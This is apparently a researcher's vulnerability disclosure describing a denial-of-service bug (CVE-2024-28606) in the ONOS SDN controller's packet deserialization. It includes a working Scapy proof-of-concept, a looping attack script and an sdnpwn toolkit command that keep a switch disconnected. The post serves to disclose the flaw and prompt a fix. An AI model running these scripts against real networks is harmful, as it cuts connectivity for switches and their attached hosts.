Update: CVE-2024-28606 has been reserved for this vulnerability.
The ONOS Software-Defined Networking (SDN) controller has been around for a while now. I've spent a bit of time using this controller in my own research, and I've found several security issues in it in the past. Recently I decided to take another crack at finding more vulnerabilities - specifically focusing on the packet parsing code and logic.
After some initial probing I managed to identify an issue that leads to Denial of Service. Unfortunately, when I went to report this issue I found that there wasn't really anyone to report it to. In the past, I would report vulnerabilities through the security at onosproject.org email address, but this is no longer monitored by anyone working on the project... and there doesn't seem to be anyone really working on the project anymore either, at least not to the same extent that there was a few years ago. Without anyone to report this to, I can't follow my usual process of responsible disclosure. This post aims to document the vulnerability so that it's known, and someone with more experience working on the ONOS project can hopefully add a patch. While I have some familiarity with the ONOS code-base, I don't have enough experience with it and with Karaf to be able to develop a patch myself.
When ONOS receives a packet-in message from a switch, it parses the layer 2 and layer 3 header details from the packet in. When the Ethernet header details are parsed, the EtherType is used to identify the function that needs to be called to parse, or deserialize, the next header (e.g. 0x0806 = ARP.deserializer(), 0x0800=IP.deserializer()). The function used to deserialize ARP headers is shown in Figure 1.
As part of the deserialisation process, a function checkInput(), shown in Figure 2, is called to validate the header data that's about to be deserialised.
This function does a couple of things; it checks that there is data to deserialize and it checks that the header lengths make sense for the given protocol. If either of these checks return a negative then this function throws a DeserializationException. Now, while this checkInput() function should, and to an extent does, prevent issues related to packet deserialization, the error that's thrown doesn't appear to be properly handled.
When an OpenFlow switch is connected to the controller, the DeserializationException thrown by the checkInput() function causes the switch to momentarily disconnect. This can be triggered by sending a packet with either the ARP or IP EtherType, but no matching header. An attacker can send such a packet into the switch they are connected to. This is trivial to do with Scapy:
from scapy.all import sendp, Ether sendp(Ether(type=0x0806), iface=iface)
The above code will trigger two exceptions in ONOS, shown in Figures 3 and 4.
The OpenFlow channel's NullPointerException exception occurs directly after the DeserializationException, which leads me to believe that the latter exception thrown by the checkInput() is not properly handled.
The NullPointerException causes the switch to disconnect from the controller, and causes the attached hosts to be removed from the ONOS host store (Figure 5). Now, the switch will immediately reconnect, as it is designed to do, but an attacker can cause the switch to become disconnected indefinitely if they continue to send packets that trigger the bug.
The real problem with the switch being forced offline is that new flows cannot be installed in the switch for traffic going to or from hosts attached to the affected switch, meaning that new connections to or from these hosts cannot be made. Existing flows in the switch can still be used by the attached hosts. The switch's disconnected state does not affect the attackers ability to continue the attack. Again, it's trivial for an attacker to carry out a prolonged attack to disconnect the switch indefinitely:
#!/usr/bin/python3 from scapy.all import sendp, Ether from time import sleep # Host network interface iface = "h1-eth0" while(1): # Send frame with no payload to trigger bug sendp(Ether(type=0x0806), iface=iface) # Alt using 0x0800 #sendp(Ether(type=0x0800), iface=iface) sleep(0.2)
Something interesting with this is that the attacker can cause different effects by modulating the packet rate. For example, the above code sends packets at a frequency of 0.2 seconds, which is enough to essentially disconnect the switch entirely (i.e. the switch never gets the opportunity to completely reconnect to the controller). Sending packets at a slower frequency, like 1 packet per 0.5 seconds, allows some communication between the switch and controller, enough to allow packet-in messages to be sent but not enough to allow flows to be installed, resulting in higher latency communication with hosts attached to the switch.
A module to carry out this attack is available as part of the sdnpwn toolkit.
./sdnpwn.py onos-switch-conntection-dos -i INTERFACE_NAME -e 0x0806 -r 0.2
The attacker must be directly connected to the target switch.
This has been tested against the two latest versions of ONOS using the provided Docker containers. Specifically onos-latest (3.0.0) and onos-2.7-latest. I have not tested this with older versions but I suspect they may be vulnerable to this attack too.
This vulnerability is likely due to an oversite in how the exception handling was implemented for the packet deserialization process. Correcting this is likely just a case of adding a try-except in the right place. I'm hoping someone with ONOS development experience will come across this and fix it. It's trivial for an attacker to exploit this vulnerability, and successful exploitation can knock an entire network switch and the attached hosts offline for the duration of the attack. Moreover, removal of hosts from the ONOS host store could support attacks like the host location or persona hijacking attacks.
It's a shame that there doesn't seem to be the same level of centralised management for ONOS development that there used to be. The project has only has minor updates for the last while, with most of the latest development seeing to focus on the uONOS project instead. However, even uONOS development appears to be slow. This may be a reflection on the lack of demand for OpenFlow and P4 controllers right now.